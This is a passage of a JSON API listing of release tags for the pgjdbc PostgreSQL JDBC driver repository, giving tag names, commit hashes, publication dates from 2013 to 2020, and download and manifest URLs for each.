","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1/manifests"},{"name":"REL42.2.12","sha":"f06c15eac9d517f08bc21913fb20ee47b125d40b","kind":"tag","published_at":"2020-03-31T18:52:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.12","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12/manifests"},{"name":"REL42.2.11","sha":"2083cf472be3006a01493b8fe42de54eabf9ba07","kind":"tag","published_at":"2020-03-10T15:38:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11/manifests"},{"name":"v42.3.0-rc5","sha":"a7d6e00b8281faaf6ff07b06a60d3291763afb8c","kind":"tag","published_at":"2020-03-04T21:09:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5/manifests"},{"name":"v42.3.0-rc2","sha":"2c1e0ef343050cb880b896abb142b2312d6988a7","kind":"tag","published_at":"2020-03-01T18:39:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2/manifests"},{"name":"v42.3.0-rc1","sha":"860979fd94d7e87ef33c6535b30eb2e8cd80acdd","kind":"tag","published_at":"2020-03-01T18:19:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1/manifests"},{"name":"REL42.2.10","sha":"c81913658858c623ebc4582eb703c2d8e21212ee","kind":"tag","published_at":"2020-02-06T18:49:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10/manifests"},{"name":"REL42.2.9","sha":"29c65312a110b1ed9811930547540ebb34188e15","kind":"tag","published_at":"2019-12-07T14:12:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9/manifests"},{"name":"REL42.2.8","sha":"33e74f5c2239ea79a9dffb13eb1a3eb8625b3d9a","kind":"tag","published_at":"2019-09-13T17:05:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8/manifests"},{"name":"REL42.2.7","sha":"443521738ab6ab6bcc4a4a8eaaf632899228dc4d","kind":"tag","published_at":"2019-09-10T12:39:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7/manifests"},{"name":"REL42.2.6","sha":"cf42ba2a804d81a49e91e26c772fbed3d5eb43be","kind":"tag","published_at":"2019-06-19T19:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6/manifests"},{"name":"REL42.2.5","sha":"a1a5ae4f2283d4557f36756d1a0228310a3acccb","kind":"tag","published_at":"2018-08-27T15:38:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5/manifests"},{"name":"REL42.2.4","sha":"b3821baff00a9517f40278b5160a7495fa42a7ad","kind":"tag","published_at":"2018-07-14T13:42:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4/manifests"},{"name":"REL42.2.3","sha":"220c02fce06980733163020634f97cf2d8483f39","kind":"tag","published_at":"2018-07-12T09:44:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3/manifests"},{"name":"REL42.2.2","sha":"c9b1678f519243cb4b044e1bc7cab59070ac1a58","kind":"tag","published_at":"2018-03-15T16:13:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2/manifests"},{"name":"REL42.2.1","sha":"7bb4ebc1c5775a0dca0adf8d760acd5336d355fc","kind":"tag","published_at":"2018-01-25T15:42:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1/manifests"},{"name":"REL42.2.0","sha":"0bbd405590d898a184d5f46331cc803c5a1b22c6","kind":"tag","published_at":"2018-01-17T17:22:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0/manifests"},{"name":"REL42.1.4","sha":"32fb99e7a8a583e057a9f59e8e5bac1571701233","kind":"tag","published_at":"2017-08-01T17:09:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4/manifests"},{"name":"REL42.1.3","sha":"29fe74ee13300811aa05dd233d149763203ef40f","kind":"tag","published_at":"2017-07-14T08:36:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3/manifests"},{"name":"REL42.1.2","sha":"de44a7623a05e2b4d075c84692cda2ab7a208157","kind":"tag","published_at":"2017-07-12T15:23:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2/manifests"},{"name":"REL42.1.1","sha":"2e2ac0d294168d1896a90da470864c12af491a6b","kind":"tag","published_at":"2017-05-05T22:20:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1/manifests"},{"name":"REL42.1.0","sha":"95e06e744ea3b9f4ff7de856d227d64fba32e45e","kind":"tag","published_at":"2017-05-04T21:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0/manifests"},{"name":"REL42.0.0","sha":"e06a13ad8f17d04e98087039b6e346474b20e257","kind":"tag","published_at":"2017-02-18T19:26:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.0.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0/manifests"},{"name":"REL9.4.1212","sha":"4d7a7618adb6c2b3a82a770d84747aeee4b55384","kind":"tag","published_at":"2016-11-02T17:09:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1212","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1212","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1212","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212/manifests"},{"name":"REL9.4.1211","sha":"f808def0c90114f8912135553a77fe3d7625e9db","kind":"tag","published_at":"2016-09-18T13:55:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1211","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1211","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1211","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211/manifests"},{"name":"REL9.4.1210","sha":"b29c95fa924eca19c002b8d21e2e216646c18faa","kind":"tag","published_at":"2016-09-06T20:46:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1210","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1210","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1210","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210/manifests"},{"name":"REL9.4.1209","sha":"51684d9a898e8b6853e04d01b2f99e06e01e55dd","kind":"tag","published_at":"2016-07-15T13:00:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1209","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1209","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1209","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209/manifests"},{"name":"REL9.4.1208","sha":"5b4c6fad736d71f5ed654ac4e2913b006591c8fe","kind":"tag","published_at":"2016-02-19T19:35:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1208","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1208","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1208","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208/manifests"},{"name":"REL9.4.1207","sha":"f17e2f3074a95dc767d6d896ffd696e045b48466","kind":"tag","published_at":"2015-12-22T20:21:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1207","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1207","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1207","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207/manifests"},{"name":"REL9_4_1206","sha":"e0a9b414eab3e1186e9af0450aaa9dfbf096f59e","kind":"commit","published_at":"2015-11-25T20:49:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1206","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1206","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1206","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206/manifests"},{"name":"REL9_4_1205","sha":"fe777e75aa1a8098edc5de44d97895049f4f6518","kind":"commit","published_at":"2015-11-03T15:48:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1205","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1205","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1205","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205/manifests"},{"name":"REL9_3_1104","sha":"de86e79d80ed08580fe0019d0696e9591035902c","kind":"commit","published_at":"2015-10-09T19:11:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1104","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104/manifests"},{"name":"REL9_4_1204","sha":"a194c5e5429bb6edb0465b6fd254ea1d78237f54","kind":"commit","published_at":"2015-10-09T18:55:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1204","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1204","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1204","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204/manifests"},{"name":"REL9_4_1203","sha":"a0bafcd8158b1938159fb49894fa403e04238267","kind":"commit","published_at":"2015-09-17T21:10:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1203","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1203","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1203","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203/manifests"},{"name":"REL9_4_1202","sha":"8e3e868792a27625c65021f7733661614c02aaa0","kind":"commit","published_at":"2015-08-27T20:45:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1202","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1202","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1202","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202/manifests"},{"name":"REL9_4_1201","sha":"a4f8c9ecfe0cf8f162f49bdfd8db5ff0baedb233","kind":"commit","published_at":"2015-02-25T16:00:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1201","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1201","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1201","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201/manifests"},{"name":"REL9_4_1200","sha":"77ab3f6c92e931bc44ed97248ab367a4c798b687","kind":"tag","published_at":"2015-01-28T12:36:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1200","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1200","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1200","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200/manifests"},{"name":"REL9_3_1103","sha":"ed37012bb880dde1c2a8b2949dfa47bbad6d7c37","kind":"commit","published_at":"2015-01-02T20:04:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1103","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103/manifests"},{"name":"REL9_3_1102","sha":"820d560ff5ade8cd63083339d23b655ba5def6a7","kind":"tag","published_at":"2014-07-10T20:55:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1102","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102/manifests"},{"name":"REL9_3_1101","sha":"f2d036adbea166e9a6574b6ee430e81dcd6d5f7e","kind":"commit","published_at":"2014-02-18T13:50:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1101","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1101","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1101","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101/manifests"},{"name":"REL9_2_1004","sha":"38152acc7b38c74476d9f85f21216c586ada7988","kind":"tag","published_at":"2013-10-31T14:04:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1004","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1004","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1004","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004/manifests"},{"name":"REL9_3_1100","sha":"09eb20272c825cac351ba4bb8c251ed7bb5dd5d3","kind":"tag","published_at":"2013-10-31T14:02:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1100","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1100","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1100","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100/manifests"},{"name":"REL9_2_1003","sha":"947d5ab59c3bdfb43468ee5251aef1c73e91c9fd","kind":"tag","published_at":"2013-06-06T13:43:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1003","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1003","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1003","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003/manifests"},{"name":"REL9_2_1001","sha":"1cd438695dc35cf4c1453e5d225f698c28d7389e","k